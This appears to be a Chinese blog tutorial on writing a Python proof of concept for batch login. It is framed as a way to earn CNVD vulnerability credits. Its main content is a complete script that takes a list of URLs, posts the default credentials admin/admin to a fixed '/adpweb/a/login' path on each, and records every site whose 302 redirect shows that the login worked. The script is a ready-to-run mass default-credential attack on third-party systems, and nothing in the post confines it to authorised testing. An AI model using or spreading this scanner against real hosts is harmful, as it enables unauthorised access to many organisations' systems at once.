PythonPoc基础编写（3）---批量登录

---

前言

想刷cnvd？最重要的是登录进行测试功能点

---

一、发现过程

找到一个网站

发现登录失败返回200

登录成功则是重定向 302
那就写一个脚本吧

二、使用步骤

1.引入库

import requests

2.读入数据

import requests

# 读取 URL 文件
with open('urls.txt', 'r') as file:
    urls = file.readlines()

# 请求头
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0"
}

# 请求数据
data = {
    "username": "admin",
    "password": "admin"
}

# 对每个 URL 发送 POST 请求
for url in urls:
    url = url.strip()
    if not url.startswith("http://") and not url.startswith("https://"):
        url = f"http://{url}"
    url = f"{url.rstrip('/')}/adpweb/a/login"

    try:
        response = requests.post(url, headers=headers, data=data, allow_redirects=False)
        print(f"请求 URL: {url}")
        print("状态代码:", response.status_code)
        redirect_location = response.headers.get('Location')
        print("重定向地址:", redirect_location)

        print("=" * 50)

        # 如果有重定向，记录相关信息
        if redirect_location:
            with open('redirect_log.txt', 'a') as log_file:
                log_file.write(f"URL: {url}\n")
                log_file.write(f"Username: {data['username']}\n")
                log_file.write(f"Password: {data['password']}\n")
                log_file.write(f"Redirect Location: {redirect_location}\n")
                log_file.write("=" * 50 + "\n")
    except requests.exceptions.RequestException as e:
        print(f"请求 URL {url} 失败: {e}")
        print("=" * 50)

结果

总结

只要找到特征就可以批量进行登录，poc很简单的，六花祝你天天开心